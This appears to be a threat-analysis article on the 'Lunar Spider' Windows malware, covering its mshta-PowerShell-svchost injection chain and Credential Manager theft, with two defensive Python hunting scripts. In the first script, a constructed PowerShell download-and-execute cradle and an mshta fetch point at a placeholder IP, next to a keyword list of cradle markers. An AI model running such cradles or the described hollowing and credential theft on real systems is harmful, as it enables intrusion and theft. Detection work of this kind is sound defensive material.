Lunar Spider: A Stealthy Threat to Windows Systems

In mid-September 2025, cybersecurity researchers identified a new malware strain named Lunar Spider, which poses a significant threat to Windows environments because a single click on a phishing link is enough to compromise a system. The malware combines living-off-the-land binaries (mshta.exe, PowerShell and BITS), in-memory execution and process injection to evade detection, and it harvests the credentials stored in Windows Credential Manager.

Infection Mechanism

Lunar Spider’s attack begins with a phishing email or instant message containing a seemingly harmless link. When the recipient clicks it, the malware quietly downloads its core components, using built-in Windows utilities rather than a custom downloader so that the activity blends in with normal system behavior. Within minutes it establishes a foothold, enumerates active user sessions, and harvests the credentials stored under those sessions without any visible sign of compromise.

Technical Analysis

Researchers at The DFIR Report discovered Lunar Spider after observing unusual Microsoft Credential Manager API calls on several corporate endpoints. The malware uses the Windows Background Intelligent Transfer Service (BITS) to fetch additional modules from its command-and-control (C2) servers. Because BITS downloads are carried out by the BITS service itself, running inside svchost.exe over ordinary HTTP(S), the traffic appears to come from a trusted system process rather than from the malware, and many endpoint detection products do not flag it. The transfers are nevertheless recorded in the Microsoft-Windows-Bits-Client/Operational event log and are visible to Get-BitsTransfer -AllUsers, which is where defenders should look.

Once the core binary is in place, Lunar Spider runs a lightweight PowerShell loader that launches the secondary payloads directly in memory. This fileless approach leaves few forensic artifacts on disk and complicates incident response, although PowerShell script block logging (Event ID 4104) and a memory capture of the affected host can still recover the loader and its payloads.

Execution Chain

When the link is activated, a short script is executed through mshta.exe (the Microsoft HTML Application host), which invokes an obfuscated PowerShell command that downloads the core payload. The script then creates an svchost.exe process in a suspended state (CreateProcess with the CREATE_SUSPENDED flag), writes the payload into that process with WriteProcessMemory, and resumes the main thread so that the payload runs under the name of a trusted service host. This conceals the malicious code from many heuristic-based scanners, but it leaves a telling artifact: the hollowed svchost.exe has the PowerShell loader as its parent, whereas legitimate svchost.exe instances are started by services.exe.

Once in memory, the injected payload enumerates the credentials stored by Windows Credential Manager through the native Credential Manager APIs (CredEnumerate and CredRead). Because those secrets are protected with DPAPI under the logged-on user's context, calling the APIs from inside that user's session returns them already decrypted, which is why the malware first looks for active user sessions. This lets Lunar Spider harvest a wide range of credentials, from RDP and VPN logins to saved web and database passwords, within seconds of injection.
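The following is an added example, not code from The DFIR Report or from this article, showing how the two artifacts of that chain, mshta.exe spawning PowerShell and svchost.exe with an unexpected parent, can be picked out of process-creation telemetry. It runs over a handful of constructed Sysmon-style Event ID 1 records, decodes the -EncodedCommand argument so the analyst sees the download cradle rather than a Base64 blob, and flags the injection target. The field names follow Sysmon, but the sample command lines, user names and the 198.51.100.23 address are all constructed for the example.

```python
"""Hunt for the mshta.exe -> PowerShell -> hollowed svchost.exe chain in process telemetry.

Constructed example: field names follow Sysmon Event ID 1, values are made up.
"""
import base64
import ntpath
import re

# Constructed download cradle, encoded the way -EncodedCommand expects it (Base64 of UTF-16LE).
# The address is a documentation-range placeholder, not a real C2 server.
SAMPLE_CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://198.51.100.23/core.ps1')"
SAMPLE_ENCODED = base64.b64encode(SAMPLE_CRADLE.encode("utf-16le")).decode("ascii")

# Constructed Sysmon-style process-creation records (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\services.exe",
     "CommandLine": "svchost.exe -k netsvcs -p", "User": r"NT AUTHORITY\SYSTEM"},
    {"Image": r"C:\Windows\System32\mshta.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\OUTLOOK.EXE",
     "CommandLine": "mshta.exe http://198.51.100.23/invoice.hta", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\System32\mshta.exe",
     "CommandLine": "powershell.exe -nop -w hidden -enc " + SAMPLE_ENCODED, "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\svchost.exe",
     "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "CommandLine": "svchost.exe", "User": r"CORP\alice"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -File C:\Scripts\backup.ps1", "User": r"CORP\bob"},
]

# PowerShell accepts any unambiguous prefix of -EncodedCommand; match the common short forms.
ENCODED_ARG = re.compile(r"(?:^|\s)-(?:encodedcommand|enc|en|ec|e)\s+([A-Za-z0-9+/=]+)",
                         re.IGNORECASE)
CRADLE_MARKERS = ("downloadstring", "downloadfile", "invoke-webrequest", "net.webclient",
                  "invoke-expression", "iex", "start-bitstransfer")


def decode_encoded_command(cmdline):
    """Return the decoded -EncodedCommand payload, or None if there is none or it is malformed."""
    match = ENCODED_ARG.search(cmdline)
    if not match:
        return None
    try:
        return base64.b64decode(match.group(1), validate=True).decode("utf-16le")
    except (ValueError, UnicodeDecodeError):
        return None


def _basename(path):
    return ntpath.basename(path).lower()


def analyze(events):
    """Apply two behavioral rules to process-creation events and return the findings in order."""
    findings = []
    for ev in events:
        image, parent = _basename(ev["Image"]), _basename(ev["ParentImage"])

        # Rule 1: PowerShell started by mshta.exe. Decode the command so the finding carries the
        # cradle itself, and note whether it looks like a download-and-execute.
        if image in ("powershell.exe", "pwsh.exe") and parent == "mshta.exe":
            decoded = decode_encoded_command(ev["CommandLine"]) or ev["CommandLine"]
            findings.append({
                "rule": "mshta_spawns_powershell",
                "user": ev["User"],
                "decoded": decoded,
                "download_cradle": any(m in decoded.lower() for m in CRADLE_MARKERS),
            })

        # Rule 2: svchost.exe whose parent is not services.exe. Legitimate service hosts are
        # started by services.exe; a copy started by PowerShell is the injection target described
        # in the article. Baseline your own hosts first, since rare legitimate exceptions exist.
        if image == "svchost.exe" and parent != "services.exe":
            findings.append({"rule": "svchost_unexpected_parent",
                             "user": ev["User"], "parent": parent})
    return findings


if __name__ == "__main__":
    for finding in analyze(SAMPLE_EVENTS):
        print(finding)
```

Run against the sample, the benign svchost.exe (parent services.exe) and the scheduled backup script (PowerShell under explorer.exe) produce nothing, while the mshta-launched PowerShell and the svchost.exe it spawned each yield a finding. The same two rules translate directly into a SIEM query on Sysmon Event ID 1 or Windows Security Event 4688 with command-line auditing enabled.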

Impact and Recommendations

The impact of Lunar Spider’s campaign has been profound. Affected organizations report unauthorized access to internal dashboards and email accounts, followed by targeted phishing campaigns from compromised mailboxes. In some cases, attackers have leveraged stolen credentials to move laterally across networks, exfiltrating sensitive documents and financial records.

Security teams have struggled to isolate the infection because of Lunar Spider’s minimal footprint and its use of legitimate Windows processes. Organizations are urged to alert on powershell.exe (and pwsh.exe) launched as a child of mshta.exe and on svchost.exe launched by anything other than services.exe; to enforce application allow-listing (AppLocker or WDAC) that blocks mshta.exe for users who have no need for it; to disable storage of network credentials where possible (the "Network access: Do not allow storage of passwords and credentials for network authentication" policy) and keep privileged accounts from logging on to ordinary workstations, so that Credential Manager on a compromised host holds little of value; and to enable and monitor the Microsoft-Windows-Bits-Client/Operational log, alerting on transfer jobs whose URLs point outside the organization's update and software-distribution infrastructure, since that is where the C2 module downloads appear.
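As an added example that is not part of the original article, the script below applies the BITS recommendation to constructed records modelled loosely on Microsoft-Windows-Bits-Client/Operational event 59 (transfer job started). The field names are simplified, the allow-list of update hosts is an assumption to be replaced with your own, and the URLs, job names and owners are made up. Rather than alerting on any single property, it scores each job on several weak signals (host outside the allow-list, IP-literal host, cleartext scheme, empty job name, non-SYSTEM owner) so that a user-context browser update does not drown out a stage-two download from a bare IP address.

```python
"""Triage BITS transfer-start events for jobs fetching from unexpected hosts.

Constructed example: records are modelled loosely on Microsoft-Windows-Bits-Client/Operational
event 59 with simplified field names; URLs, owners and the allow-list are made up.
"""
import ipaddress
from urllib.parse import urlsplit

# Assumed allow-list of legitimate download sources (suffix match). Replace with the update,
# CDN and software-distribution hosts your environment actually uses.
ALLOWED_HOST_SUFFIXES = ("windowsupdate.com", "microsoft.com", "wsus.corp.example")

# Constructed sample records (not real log data). EventID 60 is transfer stopped; only 59 counts.
SAMPLE_BITS_EVENTS = [
    {"EventID": 59, "JobName": "WU Client Download",
     "Url": "https://dl.delivery.mp.microsoft.com/filestreamingservice/files/abc123",
     "Owner": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 59, "JobName": "WSUS content",
     "Url": "http://wsus.corp.example:8530/Content/AB/update.cab",
     "Owner": r"NT AUTHORITY\SYSTEM"},
    {"EventID": 59, "JobName": "upd",
     "Url": "http://198.51.100.23/modules/stage2.bin",
     "Owner": r"CORP\alice"},
    {"EventID": 59, "JobName": "Edge update",
     "Url": "https://msedge.b.tlu.dl.delivery.mp.microsoft.com/filestreamingservice/files/def456",
     "Owner": r"CORP\bob"},
    {"EventID": 59, "JobName": "",
     "Url": "https://cdn-assets.invalid/static/bundle.dat",
     "Owner": r"CORP\alice"},
    {"EventID": 60, "JobName": "upd",
     "Url": "http://198.51.100.23/modules/stage2.bin",
     "Owner": r"CORP\alice"},
]


def host_allowed(host):
    """True when the host is one of the allow-listed hosts or a subdomain of one."""
    return any(host == s or host.endswith("." + s) for s in ALLOWED_HOST_SUFFIXES)


def is_ip_literal(host):
    """True when the URL names the server by address instead of by DNS name."""
    try:
        ipaddress.ip_address(host)
        return True
    except ValueError:
        return False


def score_bits_job(event):
    """Return (score, reasons) for one transfer-start record; 0 means the source is allow-listed."""
    parts = urlsplit(event["Url"])
    host = (parts.hostname or "").lower()
    if host_allowed(host):
        return 0, []
    reasons = ["host not in allow-list"]
    if is_ip_literal(host):
        reasons.append("IP-literal host")
    if parts.scheme != "https":
        reasons.append("cleartext scheme")
    if not event.get("JobName"):
        reasons.append("empty job name")
    # User-context jobs are common (browser and application updaters), so this is a weak
    # signal on its own and only contributes to the score.
    if not event["Owner"].upper().endswith("SYSTEM"):
        reasons.append("job owned by a non-SYSTEM account")
    return len(reasons), reasons


def hunt(events, threshold=2):
    """Return transfer-start (event 59) jobs scoring at or above threshold, highest first."""
    hits = []
    for event in events:
        if event.get("EventID") != 59:
            continue
        score, reasons = score_bits_job(event)
        if score >= threshold:
            hits.append({"url": event["Url"], "owner": event["Owner"],
                         "score": score, "reasons": reasons})
    return sorted(hits, key=lambda h: h["score"], reverse=True)


if __name__ == "__main__":
    for hit in hunt(SAMPLE_BITS_EVENTS):
        print(hit)
```

On the sample data the Windows Update, WSUS and Edge jobs score zero, the job pulling stage2.bin from a bare IP over HTTP under a user account scores highest, and the unnamed job to an unknown CDN comes second. To confirm a hit on a live host, list the current jobs with Get-BitsTransfer -AllUsers from an elevated PowerShell session (or bitsadmin /list /allusers on older systems) and compare the job owner and URL against what the log recorded.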

As Lunar Spider continues to evolve, defenders must adopt a layered security posture that combines behavioral analytics with proactive threat hunting to mitigate the risks posed by this stealthy malware.